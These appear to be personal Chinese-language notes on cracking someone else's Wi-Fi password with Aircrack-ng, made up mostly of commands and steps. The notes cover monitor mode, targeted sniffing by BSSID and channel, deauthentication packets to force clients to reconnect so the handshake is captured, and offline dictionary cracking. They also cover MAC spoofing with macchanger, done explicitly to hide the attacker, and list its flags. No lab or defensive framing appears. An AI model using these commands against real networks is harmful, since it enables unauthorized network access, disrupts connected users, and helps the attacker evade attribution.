无线密码获取
1、命令:
airmon-ng check kill结束进程
airmon-ng start wlan0 加载网卡
airodump-ng wlan0mon 建立监听
airodump-ng -c 13 --bssid DC:FE:18:1B:42:6B -w ~/ wlan0mo
airodump-ng --ivs -w xiaobai --bssid (mac地址) -c (信道) wlan0mon--ivs文件格式
-w xiaobai 文件名字此时能抓到就退出抓不到把攻击对方目标,使他重新握手,抓取密文
aireplay-ng -0 20 -a 路由器Mac地址 –c 客户机mac地址 wlan0mon
-0 :发送工具数据包的数量,这里是20个(或者无限次攻击改成0 )这样就能获得密文
aircrack-ng xiaobai.ivs -w 字典名
就这样开始破解了
2、实现步骤
- 1. 修改无线网卡状态:先 down 掉
- 2. 伪造无线网卡的 MAC 地址:安全起见。
- 3. 修改网卡工作模式:进入Monitor状态,会产生一个虚拟的网卡
- 4. 修改无线网卡状态: up
- 5. 查看网络状态,记录下 AP 的 MAC 和本机的 MAC ,确定攻击目标
- 6. 监听抓包:生成 .cap 或 .ivs
- 7. 干扰无线网络:截取无线数据包,发送垃圾数据包,用来获得更多的有效数据包
- 8. 破解 .cap 或 .ivs ,获得 WEP 密码,完成破解
- 9、个人认为复杂的密码应该搞不出来,(因为密码复杂了字典就大了,电脑就带不动了)
- 10、注意无线网卡必须要带有监听的才行
3、使用到的工具
- 1、Aircrack-ng工具包
- 1、airmon-ng:处理网卡工作模式
- 2、airodump-ng:抓包
- 3、aircrack-ng:破解
- 4、airepay-ng:发包、干扰
- 2、ifconfig:查看修改网卡状态
-
- 1、ifconfig wlan0 down:禁用网卡
- 2、ifconfig wlan0 up:启用网卡
- 3、目的是为了修改MAC地址
- 3、macchanger:伪造MAC
-
- -h 显示帮助
- -V 显示版本
- -s 显示当前MAC
- -e 不改变mac,使用硬件厂商写入的MAC
- -a 自动生成一个同类型的MAC,同厂商的
- -A 自动生成一个不同类型的MAC,不同厂商的
- -r 生成任意MAC
- -l 显示已知厂商的网卡MAC地址分配,这个很有用,可以根据MAC查出
- 来是哪个厂商生产的产品
- -m 设置一个自定义的MAC
- 如: macchanger --mac=00:34:00:00:00:00 ath0 。
- 4、iwconfig:针对无线网卡的工具
- 5、iwlist:获取无线网络更详细的命令